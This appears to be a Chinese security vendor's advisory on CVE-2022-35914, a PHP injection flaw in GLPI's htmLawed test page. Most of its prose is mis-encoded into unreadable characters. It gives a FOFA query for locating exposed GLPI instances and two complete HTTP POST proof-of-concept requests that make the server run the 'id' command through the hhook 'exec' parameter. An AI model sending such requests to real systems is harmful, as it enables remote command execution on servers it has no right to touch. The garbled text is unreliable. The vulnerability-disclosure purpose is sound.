Ìá½»ÐèÇó
*
*

*
*
*
Á¢¼´Ìá½»
µã»÷¡±Á¢¼´Ìá½»¡±£¬±íÃ÷ÎÒÀí½â²¢Í¬Òâ ¡¶»Æ½ð³Ç¿Æ¼¼Òþ˽Ìõ¿î¡·

logo

    ²úÆ·Óë·þÎñ
    ½â¾ö·½°¸
    ¼¼ÊõÖ§³Ö
    ºÏ×÷·¢Õ¹
    ¹ØÓڻƽð³Ç

    ÉêÇëÊÔÓÃ
      CVE-2022-35914£ºGLPI ×¢Èë©¶´¼òÎö
      ·¢²¼Ê±¼ä£º2023-02-10 ÔĶÁ´ÎÊý£º 1016 ´Î
      ©¶´¸ÅÊö

      GLPIÊǸöÈË¿ª·¢ÕßµÄÒ»¿î¿ªÔ´ITºÍ×ʲú¹ÜÀíÈí¼þ¡£¸ÃÈí¼þÌṩ¹¦ÄÜÈ«ÃæµÄIT×ÊÔ´¹ÜÀí½Ó¿Ú£¬¿ÉÒÔÓÃËüÀ´½¨Á¢Êý¾Ý¿âÈ«Ãæ¹ÜÀíITµÄµçÄÔ£¬ÏÔʾÆ÷£¬·þÎñÆ÷£¬´òÓ¡»ú£¬ÍøÂçÉ豸£¬µç»°£¬ÉõÖÁÎø¹ÄºÍÄ«ºÐµÈ¡£

      GLPI 10.0.2¼°Ö®Ç°°æ±¾´æÔڻƽð³Ç¹ÙÍøÂ©¶´£¬¸Ã©¶´Ô´ÓÚhtmlawed Ä£¿éÖеĠ/vendor/htmlawed/htmlawed/htmLawedTest.php ÔÊÐí PHP ´úÂë×¢È롣©¶´±àºÅ£ºCVE-2022-35914£¬Â©¶´µÈ¼¶£º¸ßΣ¡£

      Ó°Ïì°æ±¾

      GLPI 10.0.2¼°Ö®Ç°°æ±¾

      ©¶´¸´ÏÖ

      fofaËÑË÷Óï·¨£º


      title="GLPI - µÇ½Èë¿Ú"

      ͼƬ

      ʹÓÃBurpsuite¹¤¾ß×¥°ü£¬Ö´ÐÐÈçÏÂPOC»ñÈ¡tokenºÍsidµÄÖµ¡£



      POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1Host: {hostname}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateDNT: 1Connection: closeCookie: sid=d531j7fek8t6v3d0d0jpk558q5Upgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 88
      token=6dfbe8fefb8bf88a06596e458b976911&text=id&hhook=£å£ø£å£ã&sid=d531j7fek8t6v3d0d0jpk558q5
      ͼƬ
      ͼƬ

      ½«sidÔÚcookieÍ·ºÍPOSTÊý¾Ý°ütoken²ÎÊýÖÐÌæ»»£¬½«tokenÔÚPOSTÊý¾Ý°ütoken²ÎÊýÖÐÌæ»»£¬£å£ø£å£ãÖ´ÐÐidÃüÁµÃµ½»ØÏÔ¡£




      POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1Host: {hostname}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateDNT: 1Connection: closeCookie: sid=53lec8gbd0dvh64k0ikst1d0riUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 88
      token=94dd0c78fff81fb34a491754631e8ee7&text=id&hhook=£å£ø£å£ã&sid=53lec8gbd0dvh64k0ikst1d0ri

      ͼƬ

      ´¦Öý¨Òé

      ¸ù¾Ý¹Ù·½ÎĵµÉý¼¶ÖÁ×îа汾¡£


      Ãâ·ÑÊÔÓÃ
      ·þÎñÈÈÏß

      ÂíÉÏ×Éѯ

      400-811-3777

      »Øµ½¶¥²¿
      ¡¾ÍøÕ¾µØÍ¼¡¿¡¾sitemap¡¿